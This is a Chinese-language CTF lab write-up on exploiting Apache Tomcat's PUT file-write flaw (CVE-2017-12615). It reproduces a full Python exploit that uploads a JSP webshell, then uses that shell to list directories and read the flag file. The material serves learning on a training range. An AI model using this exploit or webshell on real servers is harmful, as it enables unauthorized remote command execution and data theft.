栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

中间件:tomcat任意文件写入

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

中间件:tomcat任意文件写入

靶场地址:Apache Tomcat/8.5.19

解题准备:网上找exp

解题思路:

1、exp

import requests
import sys
import time

'''
Usage:
	python CVE-2017-12615.py http://127.0.0.1

	shell: http://127.0.0.1/201712615.jsp?pwd=fff&cmd=whoami


'''

def attack(url):
	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
	headers={"User-Agent":user_agent}
	data="""<%
    if("fff".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("
");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("
"); } %>""" try: requests.put(url, headers=headers, data=data) time.sleep(2) verify_response = requests.get(url[:-1], headers=headers) if verify_response.status_code == 200: print('success') else : print (verify_response.status_code) except : "error" if __name__ == '__main__': target_url = sys.argv[1] + '/201712615.jsp/' attack(target_url) print ('shell: ' + target_url[:-1])

2、exp中,密码是pwd,命令是cmd,使用python执行

python .CVE-2017-12615.py http://www.whalwl.site:18082/

 3、返回success,成功上传jsp

http://www.whalwl.site:18082//201712615.jsp

4、浏览器执行命令,查看当前目录

http://www.whalwl.site:18082//201712615.jsp?pwd=fff&cmd=ls

5、并没有发现flag文件,采用目录遍历命令

http://www.whalwl.site:18082//201712615.jsp?pwd=fff&cmd=ls -R

6、发现在./webapps/ROOT/this_flag_6689c37d4804bdfd.txt 

7、 访问flag文件

http://www.whalwl.site:18082//201712615.jsp?pwd=fff&cmd=cat ./webapps/ROOT/this_flag_6689c37d4804bdfd.txt

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/326837.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号